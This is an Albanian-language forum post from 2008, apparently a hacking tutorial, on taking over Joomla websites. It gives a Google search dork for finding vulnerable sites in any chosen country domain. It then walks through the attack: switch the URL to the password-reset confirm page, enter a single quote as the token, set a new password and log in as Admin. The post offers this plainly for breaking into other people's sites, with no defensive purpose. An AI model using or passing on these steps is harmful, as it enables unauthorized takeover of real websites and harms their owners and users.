Would you like to react to this message? Create an account in a few clicks or log in to continue.


 
ForumForum  Si te Hackojme Joomla Sites (SQL Injection) Empty  KërkoKërko  RegjistrohuRegjistrohu  identifikimiidentifikimi  

 

 Si te Hackojme Joomla Sites (SQL Injection)

Shko poshtë 
AutoriMesazh
Bloodseeker'
Moderator
Moderator
Bloodseeker'

Numri i postimeve : 50
Join date : 20/10/2008

Si te Hackojme Joomla Sites (SQL Injection) Empty
MesazhTitulli: Si te Hackojme Joomla Sites (SQL Injection)   Si te Hackojme Joomla Sites (SQL Injection) Icon_minitimeThu Oct 23, 2008 8:41 pm

Si te Hackojme Joomla Sites (SQL Injection)
Se pari hyjme :

WwW.GoogLe.com

Me pas ne BOX shenojme :

inurl:index.php?option=com_user site:.com

Qe sherben per me gjet sajte Joomla, ndersa aty .com mundeni me bo ndryshu domainin qfare deshironi ta hackni
P.SH .ru .dk .de etj etj

Ja P.SH keshtu duhet te jete (ndryshe sben) :
http://www.bllablla.ru/index.php?opt...er&view=remind


Tash vazhdojme keshtu
Ja hekim kete pjesen e fundit :

index.php?option=com_user&view=remind

Dhe e zevendesojme me kete :

index.php?option=com_user&view=reset&layout=confir m


Pastaj do ju del ni box ku shkruan TOKEN dhe ne te duhet te shenoni vetem kete shenje qe gjendet me posht me te kalter :

'

Pastaj do ju dal te shenoni Passwordin e ri dhe ta komfirmoni ate !!
Dhe me pas ne Web ja bojme Login :

Login : Admin
Pass : Si e keni lon ju

KUJDES :

* Nuk punon ne te gjitha mirepo ne shumicen e webeve puno Wink me t'mira albagroup
Mbrapsht në krye Shko poshtë
 
Si te Hackojme Joomla Sites (SQL Injection)
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Multimedia :: Tutorials & Mësime-
Kërce tek: